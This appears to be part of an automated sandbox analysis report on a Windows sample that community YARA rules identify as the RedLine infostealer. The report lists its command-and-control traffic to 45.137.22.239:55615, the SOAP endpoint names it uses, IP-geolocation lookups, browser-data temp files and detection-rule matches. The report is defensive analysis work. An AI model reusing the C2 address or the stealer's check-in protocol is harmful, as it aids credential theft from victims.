                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.239:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.239:5
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.239:55615
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.239:55615/
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.239:55615t-
                    Source: PzPxqbK89H.exe, VzwumYUBCtHW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: PzPxqbK89H.exe, VzwumYUBCtHW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: PzPxqbK89H.exe, VzwumYUBCtHW.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735276217.000000000344C000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1837857971.00000000024DC000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: PzPxqbK89H.exe, 00000000.00000002.1739279048.0000000005D20000.00000004.00000020.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: PzPxqbK89H.exe, VzwumYUBCtHW.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PzPxqbK89H.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    .NET source code contains very large array initializations
                    Source: PzPxqbK89H.exe, If.csLarge array initialization: : array initializer size 476497
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_019EDF8C0_2_019EDF8C
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_05891FF00_2_05891FF0
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_058900070_2_05890007
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_058900400_2_05890040
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C3A8680_2_07C3A868
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C34E200_2_07C34E20
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C34E300_2_07C34E30
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C345C00_2_07C345C0
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C345AB0_2_07C345AB
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C364D80_2_07C364D8
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C3CA300_2_07C3CA30
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C349E90_2_07C349E9
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C349F80_2_07C349F8
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C369010_2_07C36901
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C369100_2_07C36910
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_07C3A8580_2_07C3A858
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 8_2_027DE7B08_2_027DE7B0
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 8_2_027DDC908_2_027DDC90
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 10_2_0099DF8C10_2_0099DF8C
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 10_2_04BE40E810_2_04BE40E8
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 10_2_04BE40D810_2_04BE40D8
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 10_2_04BE23C010_2_04BE23C0
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_02BAE7B014_2_02BAE7B0
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_02BADC9014_2_02BADC90
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066A963014_2_066A9630
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066A446814_2_066A4468
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066A121014_2_066A1210
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066A332014_2_066A3320
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066AD14014_2_066AD140
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 14_2_066ADA3014_2_066ADA30
                    Source: PzPxqbK89H.exeStatic PE information: invalid certificate
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1744000344.0000000007BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1743634779.0000000007AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDBNj.exe8 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735276217.0000000003401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1733426322.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PzPxqbK89H.exe
